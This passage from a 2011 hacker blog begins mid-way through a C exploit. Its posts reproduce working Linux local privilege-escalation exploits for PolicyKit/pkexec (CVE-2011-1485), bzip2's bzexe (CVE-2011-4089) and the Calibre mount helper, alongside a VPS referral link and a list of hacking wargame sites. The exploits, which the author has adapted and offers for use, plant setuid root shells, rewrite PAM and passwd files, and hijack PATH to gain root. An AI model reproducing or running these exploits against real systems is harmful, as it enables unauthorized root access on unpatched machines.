	addr[13] = '\x80';
	addr[14] = '\x04';
	addr[15] = '\x20';
#endif
#endif
	if ((out_fd = socket(PF_UNIX, SOCK_DGRAM, 0)) == -1) {
	perror("-> socket");
	exit(EXIT_FAILURE);
	}
	if ((in_fd = mkstemp(template)) == -1) {
	perror("-> mkstemp");
	exit(EXIT_FAILURE);
	}
	if(unlink(template) == -1) {
	perror("-> unlink");
	exit(EXIT_FAILURE);
	}
	if (ftruncate(in_fd, PAGE_SIZE) == -1) {
	perror("-> ftruncate");
	exit(EXIT_FAILURE);
	}
	sendfile(out_fd, in_fd, NULL, PAGE_SIZE);
	execl("/bin/sh", "/bin/sh", "-i", NULL);
	exit(EXIT_SUCCESS);
}

Yea yea, it is modified alittle, to gain a rootshell 100% with OUT using PER_SVR/mmap_min_addr,altho that would
do for PPC and PPC64 ,payloads are done accordingly,compile it RIGHT!
xd– / #HaxNET && #HaxSHELLS !

NEED A **GOOD** VPS :
http://www.vr.org/aff.php?aff=551 – VPS 5bux ,then 10bux monthly
Gives ya IPv6 \64 and native + allows Tunnelbroker to, for having 3 tunnels IPV6,IPV4 and all BW is GENEROUS!

Please use the reflink,it WILL make YOUR stuff cheaper,you will see why when i show you ;)
If your an aff,but there is already atleast ONE who uses it and,LOVES it like me who now have 2 boxes thru
one panel,running one UK and one AMS/NL !
Lovin it!

comments: 0 » tags:

WARGAMES ~ Hack – Challenges + Some infos – LinkTos !

Posted on 22nd November 2011 in Papers

WARGAMES
———–

No.1 http://www.smashthestack.org
-> Used ALOT , well known and owner l3th4l is a good dev on this stuff, he USED to idle in my irc channel,
unfortunately i have not seen himaround lately… (I have passed many of the levels..and completed his wargame..)
I can only give you some tips, but no walkthrus, as I have promised not to… also, consult tropic for this also.
(Team STS) members are also freely hangin in #Haxnet.. feel free to talk STS anytime!

No.2 Binary CELL – binarycell.org [Not used by me yet]
-> Unknown but looks ok!

No.3 Intruded.net – www.intruded.net
-> used ALOT,also helped me learn alot about the kernel and, simple flaws wich allow bypasses.. updated,and thats
probably its BEST point.. it also has an irc.intruded.net ,and i guess maybe some help/faqs there..
Great place when it is up! Good games, very fun, I played alot on there, and yes again completed most of
this, not all tho..

No.4 https://www.wechall.net
-> From the owner …
https://www.wechall.net
is “my” site :)
acutally i referr to it as “our” site … but i am sysadmin + dev :)
it is about “hacking challenge sites” + has own challenges
a few days ago we have released a new challenge:
https://www.wechall.net/challenge/blind_lighter/index.php
it is about blind sql injection, where you have to get 32 char md5 with only 32 blind queries
sorry for the “advertisement” ..for myself i am not into “hacking” i am more a hobby coder PHP mostly
but i am interested in security too. Every good coder should have security in mind
so, hello there, now you know me a bit :)
the nice thing on wechall is that it is open source code (except some secret challenge bits)
i plan to release my web-framework on an MIT/BSD compatible license … but i think we still have a long road to go

Thats straight from the authors mouth :) And, welcome to the world of coding, fun and smashing the stack!
This will be updated as more good wargames are found.. walkthrus and private messages regarding ANY games mentioned would be welcomed to…enjoy!

xd– / #HaxNET / Admin HaxSHELLS/VPS / Admin CrazyCoders.com .. crazycoders.US / ABN Melrose PC Suppt

comments: 1 » tags:

PolicyKit Pwnage PROPER root exploit based on zx2c4 code, very nice working version made by Admin

Posted on 10th November 2011 in Codes, Exploits

Enjoy, but, i advise to simply, use the c binary if u have it compiled.. or just modify this alittle to suit needs… this works on Ubuntu 10.04.4 (latest stable anyhow)… on 3.0.4 kernel, is NOT 0day atall, but somany fakes, i guess i decided to close this one, next I will do is bzip2, or rather, have DONE but, i might hangon to it..as, if you lookin to that src, it goes VERYYYYY far… (Almost every distro affected!!)…
Anyhow this is polkit.sh :

#!/bin/sh
## policykit-pwnage.c -> to -> bash version -> polkit.sh by xd-- / #HaxNET@EFNet
cd /media/
cat > su.c << EOF
#include <unistd.h>
#include <stdio.h>
#include <fcntl.h>

void __attribute__((constructor)) init() {
char *a[] = {"/bin/sh -c ", NULL};
setuid(0);
setgid(0);
execve(*a, a, NULL);
}
EOF
cat > makesu.c << _EOF
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <sys/types.h>
#include <sys/inotify.h>

int main(int argc, char **argv) {
if (fork() != 0) {
int fd;
char pid_path[1025];
sprintf(pid_path, "/proc/%i", getpid());
close(0);
close(1);
close(2);
fd = inotify_init();
inotify_add_watch(fd, pid_path, IN_ACCESS);
read(fd, NULL, 0);
execl("/usr/bin/chsh", "chsh", NULL);
} else {
sleep(2);
execl("/usr/bin/pkexec", "pkexec", "/bin/sh", NULL);
}
return 0;
}
_EOF
gcc -o su su.c
gcc -o makesu makesu.c
./makesu chown root:root su
./makesu chmod u+s su
echo "-> Your suid shell is on /media/su make sure ya move this!"
/media/./su -c /bin/sh
/media/su -c /bin/sh
su
whoami

Thats all for now.. i doubt ill publish the bzip :P ~~
laterz.
xd–

comments: 8 » tags:

Bzip2 local root exploit code (.c) (CVE-2011-4089)

Posted on 6th November 2011 in Exploits

CVE-2011-4089
Thanks to bugs,vladz,GeorgeG,Michael Z,loophole/lh,Benjamin Renaut and anyone else involved in this, note that this race will work and give you root on debian-ubuntu and centos sofar… so it is a matter of bzip2 / bzexe being ran, and same method as before, just refined by vladz, thx and props.

To use this one, you could addin to code to make a file thru dd then compress it, even can check for wich binary exists but to date this is the better more refined exploit code for this race condition.
Note also, it is patched and, i would hope people run updates on Ubuntu atleast.

Original post: http://vladz.devzero.fr/other/bzexe_PoC.c.html

Update:
Tested on: Ubuntu 10.04.3 SMP up to date binary
Tested on: CentOS 5.0/5.5 (bzip2) upto date
Tested on: RHEL4/5/6 (bzip2 version 1.0.5-6)
Tested on: Debian 6.0.3 up to date (bzip2 version 1.0.5-6)

** I did have to change this from cc to gcc , so possibly you should check your bsd binarys ??? hehe…

/*
   bzexec_PoC.c -- bzip2 (bzexe) race condition PoC (CVE-2011-4089)

   Author:    vladz (http://vladz.devzero.fr)
   Tested on: Debian 6.0.3 up to date (bzip2 version 1.0.5-6)

   This PoC exploits a race condition in the bzexe script.  This tool is
   rarely used so I wasn't supposed to write an exploit.  But some people
   on the full-disclosure list had doubts about this exploitation.  Public
   discussion about this issue started from this post:  

http://seclists.org/fulldisclosure/2011/Oct/776

   I am using Inotify to win the race (on my dual-core, it succeed 100%).

      Usage: ./bzexe_PoC <command_name>

   For instance, if "/bin/dd" has already been compressed with bzexe,
   launch:

      $ ./bzexe_PoC dd
      [*] launching attack against "dd"
      [+] creating evil script (/tmp/evil)
      [+] creating target directory (/tmp/dd)
      [+] initialize inotify
      [+] waiting for root to launch "dd"
      [+] opening root shell
      # whoami
      root
*/
#define _GNU_SOURCE
#include <sys/inotify.h>
#include <stdlib.h>
#include <stdio.h>
#include <unistd.h>
#include <sys/syscall.h>
#include <sys/stat.h>
#include <sys/types.h>
#include <string.h>
#include <fcntl.h>

int create_nasty_shell(char *file) {
  char *s = "#!/bin/bash\n"
            "echo 'main(){setuid(0);execve(\"/bin/sh\",0,0);}'>/tmp/sh.c\n"
            "gcc /tmp/sh.c -o /tmp/sh; chown root:root /tmp/sh\n"          // edited here the cc skiddiescrew
            "chmod 4755 /tmp/sh; rm -f ${0}; ${0##*/} $@\n";

  int fd = open(file, O_CREAT|O_RDWR, S_IRWXU|S_IRWXG|S_IRWXO);
  write(fd, s, strlen(s));
  close(fd);
  return 0;
}

int main(int argc, char **argv) {
  int fd, wd;
  char buf[1], *targetpath,*evilsh = "/tmp/evil", *trash = "/tmp/trash";
  if (argc < 2) {
    printf("usage: %s <cmd name>\n", argv[0]);
    return 1;
  }
  printf("[*] launching attack against \"%s\"\n", argv[1]);
  printf("[+] creating evil script (/tmp/evil)\n");
  create_nasty_shell(evilsh);
  targetpath = malloc(sizeof(argv[1]) + 6);
  sprintf(targetpath, "/tmp/%s", argv[1]);
  printf("[+] creating target directory (%s)\n", targetpath);
  mkdir(targetpath, S_IRWXU|S_IRWXG|S_IRWXO);
  printf("[+] initialize inotify\n");
  fd = inotify_init();
  wd = inotify_add_watch(fd, targetpath, IN_CREATE);
  printf("[+] waiting for root to launch \"%s\"\n", argv[1]);
  syscall(SYS_read, fd, buf, 1);
  syscall(SYS_rename, targetpath,  trash);
  syscall(SYS_rename, evilsh, targetpath);
  inotify_rm_watch(fd, wd);
  printf("[+] opening root shell (/tmp/sh)\n");
  sleep(2);
  system("rm -fr /tmp/trash;/tmp/sh || echo \"[-] Failed.\"");
  return 0;
}

cheers
xd– / #haxnet@EF

comments: 0 » tags:

Calibre E-Book Reader local root exploitz

Posted on 3rd November 2011 in Exploits

Here we have *4* different but similar in theyre nature…
Theyre ALL nice but by far the nicest was pointed out to me by the author himself, and he would be definately in running for craziest coder of 2011 if he keeps it up :> zx2c4 i refer to, who promptly reminded me he had basically made a REALLY nice version and thus showed me to it, i was glad because I dont use pub disclosure policys usually and was happy to be able to update this post so here it is, the best by FAR (i thought v1 was nice..) but this one, is extremely nice code, and actually abit of this code would probably goto finishing the bzip2 project, well, ideally speaking.. in an ideal world..

here it is the

80. (E)-Calibre reader local root exploit (Race condition)
Love these exploits but theyre really tricky so BIG props to the author zx2c4 :D 

/*
 * ########################################################
 * #               .80 Calibrer Assault Mount             #
 * #                         by zx2c4                     #
 * ########################################################
 *
 * Yesterday's assult mount used inotify to mount into /etc/pam.d. Today we
 * expand the attack by adding a race toggler so we can mount from non-block
 * devices.
 *
 * Enjoy.
 *
 * - zx2c4
 * 2011-11-4
 *
 * greets to djrbliss
 *
 */
#include <stdio.h>
#include <sys/inotify.h>
#include <unistd.h>
#include <stdlib.h>
#include <signal.h>

int main(int argc, char **argv)
{
	printf("########################################################\n");
	printf("#               .80 Calibrer Assault Mount             #\n");
	printf("#                         by zx2c4                     #\n");
 	printf("########################################################\n\n");

	printf("[+] Cleaning up old cruft.\n");
	unlink("/dev/shm/overlay");
	system("calibre-mount-helper cleanup /dev/ram0 /media/staging/");

	printf("[+] Creating overlay container.\n");
	system("dd if=/dev/zero of=/dev/shm/overlay count=25600");
	system("/usr/sbin/mkfs.ntfs /dev/shm/overlay");

	printf("[+] Mounting staging using race condition toggler...\n");
	int childpid = fork();
	if (childpid) {
	int ret;
	while ((ret = system("calibre-mount-helper mount /dev/shm/overlay /media/staging/ 2>&1")) == 256 || ret == 8192);
		kill(childpid, SIGKILL);
	} else {
		while (1) {
			rename("/dev/shm/overlay", "/dev/shm/overlay-holder");
			symlink("/dev/ram0", "/dev/shm/overlay");
			unlink("/dev/shm/overlay");
			rename("/dev/shm/overlay-holder", "/dev/shm/overlay");
		}
		return 0;
	}

	printf("[+] Preparing overlay with /etc/pam.d modification:\n");
	system("cp -v /etc/pam.d/* /media/staging/");
	system("sed -i \"s/pam_deny.so/pam_permit.so/g\" /media/staging/common-auth");
	system("sed -i \"s/pam_cracklib.so.*/pam_permit.so/g\" /media/staging/system-auth");
	system("sed -i \"s/pam_unix.so.*/pam_permit.so/g\" /media/staging/system-auth");

	printf("[+] Mounting overlay over /etc/pam.d using race condition toggler and inotify...\n");
	childpid = fork();
	if (childpid) {
	int childpid2 = fork();
	if (childpid2) {
	int ret;
	while ((ret = system("calibre-mount-helper mount /dev/shm/overlay /etc/pam.d/ 2>&1")) == 256 || ret == 8192);
	kill(childpid, SIGKILL);
	kill(childpid2, SIGKILL);
	} else {
			while (1) {
				int fd;
				fd = inotify_init();
				unlink("/media/staging/fake");
				mkdir("/media/staging/fake");
				inotify_add_watch(fd, "/media/staging/fake", IN_CREATE);
				read(fd, 0, 0);
				rename("/media/staging/fake", "/media/staging/tmp");
				symlink("/etc/pam.d", "/media/staging/fake");
				rmdir("/media/staging/tmp");
				close(fd);
			}
		}
	} else {
		while (1) {
			rename("/dev/shm/overlay", "/dev/shm/overlay-holder");
			symlink("/dev/ram0", "/dev/shm/overlay");
			unlink("/dev/shm/overlay");
			rename("/dev/shm/overlay-holder", "/dev/shm/overlay");
		}
		return 0;
	}
	printf("[+] Asking for root. When prompted for a password, type anything and press enter.\n");
	system("su");
	return 0;
}

Then of all the calibers…

#!/bin/sh
                  #######################################
                  #     .50-Calibrer Assault Mount      #
                  #              by zx2c4               #
                  #######################################
################################################################################
# Calibre uses a suid mount helper, and like nearly all suid mount helpers that
# have come before it, it's badly broken. Let's go through Calibre's faulty code
# available at http://pastebin.com/auz9SULi and look at the array of silly
# things done, only one of which we actually need to get root.
# In this spot here, we can create a directory owned by root anywhere we want:
# 47    if (!exists(mp)) {
# 48        if (mkdir(mp, S_IRUSR|S_IWUSR|S_IXUSR|S_IRGRP|S_IXGRP|S_IROTH|S_IXOTH) != 0) {
# 49            errsv = errno;
# 50            fprintf(stderr, "Failed to create mount point with error: %s\n", strerror(errsv));
# 51        }
# 52    }
# At this point, we can remove any empty directory we want:
# 172    rmd = rmdir(mp);
# And elsewhere, we can create and remove anything_we_want/.some_stupid_marker.
# I'm sure you can figure out how to exploit these kinds of things :-P .
# We also get the ability with this wonderful mount-helper to unmount and eject
# any device that we want (as root), as well as mount any vfat filesystem that
# we'd like.
# Not only that, but we can pass params directly to mount, to some degree:
# 83    execlp("mount", "mount", "-t", "auto", "-o", options, dev, mp, NULL);
# On this line, "dev" and "mp" are controlled by argv[2] and argv[3]. I'm sure
# you can find fun things to do with this as well. (There -s and also the man
# pages say the last -o is respected, etc etc. Be creative.)
# But there's also something lurking that is way worse in this line. Is that
# "execlp" we see? Yes.  According to the man pages:
#     The execlp(), execvp(), and execvpe() functions duplicate the  actions  of
#     the  shell  in searching  for  an  executable file if the specified
#     filename does not contain a slash (/) character.
# execlp searchs PATH for where to find "mount", and then runs it as root. And,
# with great joy, we find that we can trivially control PATH by setting it
# before running the mount helper. So the attack plan is simple:
#
#    1. Make an executable named "mount" in the current directory that executes
#       a shell.
#    2. PATH=".:$PATH" calibre-mount-helper mount something somethingelse
#
# And that's it! We have root. The below exploit creates things in a temporary
# directory that gets cleaned up and displays some status information along the
# way.
# - zx2c4
# 2011-11-1
#
# Usage:
# $ ./50calibrerassaultmount.sh
# [+] Making temporary directory: /tmp/tmp.q5ktd8UcxP
# [+] Making mount point.
# [+] Writing malicious mounter.
# [+] Overriding PATH and getting root.
# [+] Cleaning up: /tmp/tmp.q5ktd8UcxP
# [+] Checking root: uid=0(root) gid=0(root) groups=0(root)
# [+] Launching shell.
# sh-4.2#
################################################################################

set -e
echo "#######################################"
echo "#     .50-Calibrer Assault Mount      #"
echo "#              by zx2c4               #"
echo "#######################################"
echo
echo -n "[+] Making temporary directory: "
dir="$(mktemp -d)"
echo "$dir"
cd "$dir"
echo "[+] Making mount point."
mkdir mountpoint
echo "[+] Writing malicious mounter."
cat > mount <<END
#!/bin/sh
cd /
echo "[+] Cleaning up: $dir"
rm -rf "$dir"
echo -n "[+] Checking root: "
id
echo "[+] Launching shell."
HISTFILE="/dev/null" exec /bin/sh
END
chmod +x mount
echo "[+] Overriding PATH and getting root."
PATH=".:$PATH" calibre-mount-helper mount /dev/null mountpoint

Then one also by the same author but, he messes up the username bit alittle here… I prefer the 3rd code for this exploit.. but here is no.3 anyhow ;s

# Exploit Title: .60-Calibrer Assault Mount: Another Calibre E-Book Reader Local Root
# Date: Nov 2, 2011
# Author: zx2c4
# Software Link: http://calibre-ebook.com/
# Tested on: Gentoo
# Platform: Linux
# Category: Local
# CVE: pending
#!/bin/sh
                  #######################################
                  #     .60-Calibrer Assault Mount      #
                  #              by zx2c4               #
                  #######################################
################################################################################
# Yesterday we learned how Calibre's usage of execlp allowed us to override PATH
# and get root, in my ".50-Calibrer Assault Mount" exploit. Today we exploit a
# more fundumental issue with Calibre's mount helper -- namely, that it allows
# us to mount a vfat filesystem anywhere we want. By mounting a file system
# image over /etc, we are able to tinker /etc/passwd and make the root password
# temporarily "toor".
# - zx2c4
# 2011-11-2
# Usage:
# $ ./60calibrerassaultmount.sh
# [+] Making temporary directory: /tmp/tmp.OGgS0jaoD4
# [+] Making overlay image:
# 51200+0 records in
# 51200+0 records out
# 26214400 bytes (26 MB) copied, 0.100984 s, 260 MB/s
# mkfs.vfat 3.0.11 (24 Dec 2010)
# [+] Mounting overlay image using calibre-mount-helper.
# [+] Copying /etc into overlay.
# [+] Tampering with overlay's passwd.
# [+] Unmounting overlay image using calibre-mount-helper.
# [+] Mounting overlay to /etc using calibre-mount-helper.
# [+] Asking for root. When prompted for a password, enter 'toor'.
# Password: [typed in toor to the terminal]
# [+] Unmounting /etc using root umount.
# [+] Cleaning up: /tmp/tmp.OGgS0jaoD4
# [+] Getting shell.
# sh-4.2# id
# uid=0(root) gid=0(root) groups=0(root)
# sh-4.2# whoami
# root
# sh-4.2#
################################################################################

echo "#######################################"
echo "#     .60-Calibrer Assault Mount      #"
echo "#              by zx2c4               #"
echo "#######################################"
echo
echo -n "[+] Making temporary directory: "
dir="$(mktemp -d)"
echo "$dir"
cd "$dir"
echo "[+] Making overlay image:"
dd if=/dev/zero of=overlay count=51200
/usr/sbin/mkfs.vfat overlay
echo "[+] Mounting overlay image using calibre-mount-helper."
mkdir staging
calibre-mount-helper mount overlay staging
echo "[+] Copying /etc into overlay."
cd staging/
cp -a /etc/* . 2>/dev/null
echo "[+] Tampering with overlay's passwd."
cat passwd | tail -n +2 > tmp
echo "root:$(echo -n 'toor' | openssl passwd -1 -stdin):0:0:root:/root:/bin/bash" >> tmp
mv tmp passwd
echo "[+] Unmounting overlay image using calibre-mount-helper."
cd ..
calibre-mount-helper eject overlay staging >/dev/null 2>&1
echo "[+] Mounting overlay to /etc using calibre-mount-helper."
calibre-mount-helper mount overlay /etc  >/dev/null 2>&1
cd /
echo "[+] Asking for root. When prompted for a password, enter 'toor'."
su -c "echo \"[+] Unmounting /etc using root umount.\"; umount /etc; echo \"[+] Cleaning up: $dir\"; rm -rf \"$dir\"; echo \"[+] Getting shell.\"; HISTFILE=\"/dev/null\" exec /bin/sh"

As you see thats abit messy when it comes to changing a set password… ;s

This is DRossenbergs version of the overlay bug wich is slightly nicer, because it probably wont mess to much with the password of user…

#!/bin/sh
             ###########################################
             #         .70-Caliber Assault Mount      #
             #  by Dan Rosenberg (@djrbliss) and zx2c4 #
             ###########################################
################################################################################
# Yesterday we learned how Calibre's ability to mount anything anywhere resulted
# in a local root. Today's exploit shows a race condition to subvert recent
# changes preventing symlinks and checking path prefixes.
# - djrbliss & zx2c4
# 2011-11-3
################################################################################
overlay=/dev/shm/overlay
staging=/media/staging
mounter=calibre-mount-helper
fakemount=/media/staging/fake
target=/etc/pam.d
mkfsntfs=/sbin/mkfs.ntfs

echo "[+] Making overlay image:"
dd if=/dev/zero of=$overlay count=51200
$mkfsntfs -F $overlay
echo "[+] Mounting overlay image using calibre-mount-helper."
$mounter mount $overlay $staging
echo "[+] Copying /etc/pam.d/ into overlay."
cp /etc/pam.d/* $staging/ 2>/dev/null
sed -i "s/pam_deny.so/pam_permit.so/g" $staging/common-auth
echo "[*] Making fake mountpoint."
rm -rf $fakemount 2>/dev/null
echo "[*] Preparing binary payload..."
cat > /tmp/pwn.c << _EOF
#include <stdio.h>
#include <sys/inotify.h>
#include <unistd.h>

int main(int argc, char **argv) {
int fd, wd, ret;
if (fork()) {
fd = inotify_init();
unlink("$fakemount");
mkdir("$fakemount");
wd = inotify_add_watch(fd, "$fakemount", IN_CREATE);
read(fd, 0, 0);
rename("$fakemount", "$staging/tmp");
symlink("$target", "$fakemount");
rmdir("$staging/tmp");
return 0;
} else {
sleep(1);
return system("$mounter mount $overlay $fakemount");
}
return 0;
}
_EOF
gcc /tmp/pwn.c -o /tmp/pwn
ret=1
while [ $ret -ne 0 ]; do
/tmp/pwn
ret=$?
done;
sleep 2
echo "[+] Asking for root. When prompted for a password, type anything and press enter."
su -c "echo \"[+] Cleaning up.\"; umount $fakemount; umount $staging; rm -rf $overlay; echo \"[+] Getting shell.\"; HISTFILE=\"/dev/null\" exec /bin/sh"

Alot of nice work for a shitty little local… well, i gess it is OK for some boxes..
xd– / #HaxNET@EFnet

comments: 2 » tags:

Policykit ( pkexec) Mutiple exploit codes

Posted on 1st November 2011 in Codes, Exploits

Here is a nice .c version but… there is a few ways this can be made…read on…
pkexec Race condition (CVE-2011-1485) exploit (.c) .. thanks to x10d4n ;) good work friend

/*
* Exploit Title: pkexec Race condition (CVE-2011-1485) exploit
* Author: xi4oyu
* Tested on: rhel 6
* CVE : 2011-1485
* Linux pkexec exploit by xi4oyu , thx dm@0x557.org * Have fun~
¡Á U can reach us  @ http://www.wooyun.org :)
*/
#include <stdio.h>
#include <limits.h>
#include <time.h>
#include <unistd.h>
#include <termios.h>
#include <sys/stat.h>
#include <errno.h>
#include <poll.h>
#include <sys/types.h>
#include <stdlib.h>
#include <string.h>

int main(int argc,char *argv[], char ** envp) {
	time_t tim_seed1;
	pid_t pid_seed2;
	int result;
	struct stat stat_buff;
	char * chfn_path = "/usr/bin/chfn";
	char cmd_buff[4096];
	char * pkexec_argv[] = {
	"/usr/bin/pkexec",
	"/bin/sh",
	"-c",
	cmd_buff,
	NULL
	};
	int pipe1[2];
	int pipe2[2];
	int pipe3[2];
	pid_t pid,pid2 ;
	char * chfn_argv[] = {
	"/usr/bin/chfn",
	NULL
	};
	char buff[8];
	char read_buff[4096];
	char real_path[512];
	struct termios termios_p;
	int count = 0;
	int flag = 0;
	int usleep1 = 0;
	int usleep2 = 0;
	bzero(cmd_buff,4096);
	bzero(real_path,512);
	realpath(argv[0],real_path);
	tim_seed1 = time(NULL);
	pid_seed2 = getpid();
	srand(tim_seed1+pid_seed2);
	//get terminal attr
	tcgetattr(0,&termios_p);
	snprintf(cmd_buff,4095,"/bin/chown root:root %s; /bin/chmod 4755 %s",real_path,real_path);
	if(! geteuid()) {
	char *exec_argv[2]={
	"/bin/sh",
	NULL
	};
	setuid(0);
	setgid(0);
	execve("/bin/sh",exec_argv,0);
	perror("execve shell");
	exit(-1);
	}
	printf("pkexec local root exploit by xi4oyu , thx to dm\n");
	if(pipe(pipe1)) {
	perror("pipe");
	exit(-2);
	}
	for(count = 500; count && !flag; count--) {
	pid = fork();
	if( !pid ){
	// Parent
	if( !pipe(pipe2)) {
	if(!pipe(pipe3)) {
	pid2 = fork();
	if(!pid2){
	// Parent 2
						close(1);
						close(2);
						close(pipe1[0]);
						dup2(pipe1[1],2);
						dup2(pipe1[1],1);
						close(pipe1[1]);
						close(pipe2[0]);
						close(pipe3[1]);
						write(pipe2[1],"\xFF",1);
						read(pipe3[0],&buff,1);
						execve(pkexec_argv[0],pkexec_argv,envp);
						perror("execve pkexec");
						exit(-3);
					}
					close(0);
					close(1);
					close(2);
					close(pipe2[1]);
					close(pipe3[0]);
					read(pipe2[0],&buff,1);
					write(pipe3[1],"\xFF",1);
					usleep(usleep1+usleep2);
					execve(chfn_argv[0],chfn_argv,envp);
					perror("execve setuid");
					exit(1);
				}
			}
			perror("pipe3");
			exit(1);
		}
		//Note: This is child, no pipe3 we use poll to monitor pipe1[0]
		memset(pipe3,0,8);
		struct pollfd * pollfd = (struct pollfd *)(&pipe3);
		pollfd->fd = pipe1[0];
		pollfd->events =  POLLRDNORM;
		if(poll(pollfd,1,1000) < 0){
			perror("poll");
			exit(1);
		}
		if(pollfd->revents & POLLRDNORM ){
			memset(read_buff,0,4096);
			read(pipe1[0],read_buff,4095);
			if( strstr(read_buff,"does not match")){
				usleep1 += 500;
				usleep2 = rand() % 1000;
			}else{
				usleep1 -= 500;
			}
		}
		if(!stat(real_path,&stat_buff)){
			if(!stat_buff.st_uid){
				if(!stat_buff.st_gid){
					if(stat_buff.st_mode & 0x800){
						char *exec_array[]={
							real_path,
							NULL
						};
						flag = 1;
						tcsetattr(0,2,&termios_p);
						execve(real_path,exec_array,0);
						perror("execve self");
						exit(1);
					}
				}
			}
		}
		tcsetattr(0,2,&termios_p);
	}
		result = 0;
		return result;
}

Thats a VERY nice version but there is more ways to exploit this… so lets keep on goin!

/* polkit-pwnage.c
 *
 * ==============================
 * =      PolicyKit Pwnage      =
 * =          by zx2c4          =
 * =        Sept 2, 2011        =
 * ==============================
 * Howdy folks,
 * This exploits CVE-2011-1485, a race condition in PolicyKit.
 * davidz25 explains:
 * --begin--
 * Briefly, the problem is that the UID for the parent process of pkexec(1) is
 * read from /proc by stat(2)'ing /proc/PID. The problem with this is that
 * this returns the effective uid of the process which can easily be set to 0
 * by invoking a setuid-root binary such as /usr/bin/chsh in the parent
 * process of pkexec(1). Instead we are really interested in the real-user-id.
 * While there's a check in pkexec.c to avoid this problem (by comparing it to
 * what we expect the uid to be - namely that of the pkexec.c process itself which
 * is the uid of the parent process at pkexec-spawn-time), there is still a short
 * window where an attacker can fool pkexec/polkitd into thinking that the parent
 * process has uid 0 and is therefore authorized. It's pretty hard to hit this
 * window - I actually don't know if it can be made to work in practice.
 * --end--
 * Well, here is, in fact, how it's made to work in practice. There is as he said an
 * attempted mitigation, and the way to trigger that mitigation path is something
 * like this:
 *     $ sudo -u `whoami` pkexec sh
 *     User of caller (0) does not match our uid (1000)
 *
 * Not what we want. So the trick is to execl to a suid at just the precise moment
 * /proc/PID is being stat(2)'d. We use inotify to learn exactly when it's accessed,
 * and execl to the suid binary as our very next instruction.
 *
 * ** Usage **
 * $ pkexec --version
 * pkexec version 0.101
 * $ gcc polkit-pwnage.c -o pwnit
 * $ ./pwnit
 * [+] Configuring inotify for proper pid.
 * [+] Launching pkexec.
 * sh-4.2# whoami
 * root
 * sh-4.2# id
 * uid=0(root) gid=0(root) groups=0(root),1(bin),2(daemon),3(sys),4(adm)
 * sh-4.2#
 *
 * ** Targets **
 * This exploit is known to work on polkit-1 <= 0.101. However, Ubuntu, which
 * as of writing uses 0.101, has backported 0.102's bug fix. A way to check
 * this is by looking at the mtime of /usr/bin/pkexec -- April 22, 2011 or
 * later and you're out of luck. It's likely other distributions do the same.
 * Fortunately, this exploit is clean enough that you can try it out without
 * too much collateral.
 * greets to djrbliss and davidz25.
 * - zx2c4
 * 2-sept-2011
 */
#include <stdio.h>
#include <stdlib.h>
#include <errno.h>
#include <unistd.h>
#include <sys/types.h>
#include <sys/inotify.h>

int main(int argc, char **argv) {
    printf("=============================\n");
    printf("=      PolicyKit Pwnage     =\n");
    printf("=============================\n\n");
    if (fork()) {
        int fd;
        char pid_path[1024];
        sprintf(pid_path, "/proc/%i", getpid());
        printf("[+] Configuring inotify for proper pid.\n");
        close(0); close(1); close(2);
        fd = inotify_init();
        if (fd < 0)
        perror("[-] inotify_init");
        inotify_add_watch(fd, pid_path, IN_ACCESS);
        read(fd, NULL, 0);
        execl("/usr/bin/chsh", "chsh", NULL);
    } else {
        sleep(1);
        printf("[+] Launching pkexec.\n");
        execl("/usr/bin/pkexec", "pkexec", "/bin/sh", NULL);
    }
    return 0;
}

now, we found a simple .sh version of this exploit, however, it was NOT written to well… so i adjusted it and seems to be working now.. will show you here…

this code is OLD code wich was posted, actually, it had even wrong paths in the makesuid section…anyhow, we will fix this now using the .c exploits…
Oh btw, that suid.c makes the shell kinda die :P so, we might need to adjust that also…

#!/bin/sh
## Polkit pwnage shell version wich was released, now re-released...
cat > suid.c << _EOF
#include <stdio.h>
#include <string.h>

int main(void) {  // looks abit better... altho, i have to test it now..
##char *root=malloc(1000);
##char perintah[256]="/bin/sh -c ";
setgid(0);
setuid(0);
##strcat(root,perintah);
execl("/bin/sh","sh",0);
}
_EOF
// ok we have fixed the paths here... lets fix our suid shell...
cat > makesuid.c << _EOF
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <sys/types.h>
#include <sys/inotify.h>

int main(int argc, char **argv) {
if (fork() != 0) {
int fd;
char pid_path[15];
sprintf(pid_path, "/proc/%i", getpid());
close(0);
close(1);
close(2);
fd = inotify_init();
inotify_add_watch(fd, pid_path, IN_ACCESS);
read(fd, NULL, 0);
execl("/usr/bin/chsh", "chsh", NULL);
} else {
sleep(1);
printf("[+] Launching pkexec.\n");
execl("/usr/bin/pkexec", "pkexec", "/bin/sh", NULL);  // our modified shell here
}
return 0;
}
_EOF

gcc -o /tmp/suid suid.c
gcc -o makesuid makesuid.c
./makesuid chown root:root /tmp/suid
./makesuid chmod u+s /tmp/suid
echo "-> Your suid is on /tmp/suid make sure u move this !!!"
/tmp/./suid -c /bin/sh

OK so, we have 2 working .c versions and, one sh version wich is very easy to fix, if it does not work already, wich it should… but then, i am using the public codes , and, i can see that pkexec is on alottt of boxes!
enjoy!
xd

edit:
here is a better version perhaps…

#!/bin/sh
## policykit-pwnage.c -> to -> bash version =)
cat > suid.c << _EOF
#include <unistd.h>
#include <stdio.h>
#include <string.h>

int main (void) {
setgid(0);
setuid(0);
execl("/bin/sh", "sh", NULL);
}
_EOF

cat > makesuid.c << _EOF
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <sys/types.h>
#include <sys/inotify.h>

int main(int argc, char **argv) {
if (fork() != 0) {
int fd;
char pid_path[15];
sprintf(pid_path, "/proc/%i", getpid());
close(0);
close(1);
close(2);
fd = inotify_init();
inotify_add_watch(fd, pid_path, IN_ACCESS);
read(fd, NULL, 0);
execl("/usr/bin/chsh", "chsh", NULL);
} else {
execl("/usr/bin/pkexec", "pkexec", "/bin/sh", NULL);
}
return 0;
}
_EOF

gcc -o /tmp/suid suid.c
gcc -o makesuid makesuid.c
./makesuid chown root:root /tmp/suid
./makesuid chmod u+s /tmp/suid
echo "-> Your suid shell is on /tmp/suid make sure u move this !"
/tmp/./suid -c /bin/sh

Enjoy x2 !

comments: 0 » tags:
« Previous